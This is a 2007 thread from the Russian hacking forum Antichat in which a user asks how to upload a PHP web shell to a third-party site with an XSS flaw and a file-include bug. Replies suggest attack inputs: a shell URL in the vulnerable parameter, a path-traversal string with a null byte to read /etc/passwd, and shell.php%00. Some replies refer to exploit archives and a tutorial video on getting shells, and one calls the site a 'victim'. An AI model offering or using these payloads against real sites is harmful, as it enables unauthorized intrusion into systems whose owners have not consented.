Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Локальный Инклуд (https://forum.antichat.xyz/showthread.php?t=30543)

NightRider 04.01.2007 14:22
Локальный Инклуд
 
Здравствуйте!

Такая проблема.

Сайт не фильтрует символы в адресной строке браузера. Что ты туда вводишь ( к примеру, тег изображения ), то этот тег станет картинкой в теле страницы. Вот в чем вопрос.

Мне надо залить файл shell.php на тот хостинг, где стоит сайт!! Но как это сделать - не знаю!

При чем, если в адр. строку браузера вписать index.php?idn=<img src=javascript:alert()>, то выскочит окно!!

Хелп, плиз!!!

D=P=CH= MOD= 04.01.2007 14:35
index.php?idn=[Адрес шелла]

некатит? 0_о

NightRider 04.01.2007 14:45
Не получается. Пишет

Warning: main(categories/http://***.ru/shell.php.htm): failed to open stream: No such file or directory in /www/htdocs/index.php on line 440

NightRider 04.01.2007 14:46
Нужно что-то с тегами!

max_pain89 04.01.2007 14:58
толпаеп, это лок. инклуд насколько я понимаю... исчи статью Грин_бира про локальный инклуд

aka PSIH 04.01.2007 15:10
NightRider
Лучше дай ссылку на сайт посматреть, а то так не понятно что у тебя там, толи xss толи лок.инкдул... или вообще все вместе...
Попробуй /../../../../../../../etc/passwd%00 дописать

guest3297 04.01.2007 15:13
локальный инклуд...

NightRider 04.01.2007 15:19
сюда

aka PSIH 04.01.2007 15:26
там только xss работает...
через лок.инклуд не чего не поимеешь

ice1k 04.01.2007 16:05
там кстати скуль вместе с инклудом О_о

zl0ba 04.01.2007 17:42
где увидел скуль? с тегами заморочка :-(

GreenBear 04.01.2007 17:48
Цитата:
через лок.инклуд не чего не поимеешь
да вы врете все.

aka PSIH 04.01.2007 17:49
Цитата:
Сообщение от Green_Bear
да вы врете все.
Что врём?

GreenBear 04.01.2007 17:51
http://www.yandex.ru/yandsearch?rpt=rad&text=%EA%E0%EA+%E8%F1%EF%EE%EB% FC%E7%EE%E2%E0%F2%FC+%EB%EE%EA%E0%EB%FC%ED%FB%E9+% E8%ED%EA%EB%F3%E4

aka PSIH 04.01.2007 17:54
Цитата:
Сообщение от Green_Bear
http://www.yandex.ru/yandsearch?rpt=rad&text=%EA%E0%EA+%E8%F1%EF%EE%EB% FC%E7%EE%E2%E0%F2%FC+%EB%EE%EA%E0%EB%FC%ED%FB%E9+% E8%ED%EA%EB%F3%E4
баян, я имею введу тот "инклуд" каторый есть на сайте о катором говорить автор... ;)

P.S: Видео по локальному инклуду, и заливки шелла:
http://urussu.org/video/local_php_including.rar

m0nzt3r 04.01.2007 23:06
Цитата:
Warning: main(categories/http://***.ru/shell.php.htm)
разве не видно, инклудится только то, что в папке categories/, да и в конец добавляется .htm, попробуй shell.php%00

XThread.DSL 06.01.2007 23:38
Цитата:
попробуй shell.php%00
и че ему это даст? инклудятся только локальные файлы.
автор ,забей на этот сайт и найди себе другую жертву )

m0nzt3r 06.01.2007 23:50
тьфу не так понял..
Цитата:
и че ему это даст?
Цитата:
http://***.ru/shell.php.htm
мало ли, вдруг в categories/ есть пхп скрипт? ;)

gemaglabin 06.01.2007 23:53
С локального инклуда за 5 минут а то и меньше получается шелл.Ищите на милворме сплоиты типа Local File Include и смотрите

FraiDex 07.01.2007 01:55
Если судить по (categories/http://***.ru/shell.php.htm), то он, помойму прикрепляет только html файлы

m0nzt3r 07.01.2007 20:42
Короче уже постят бред всякий.Стартер не получишь ты выгоду с этого инклуда.


Время: 11:16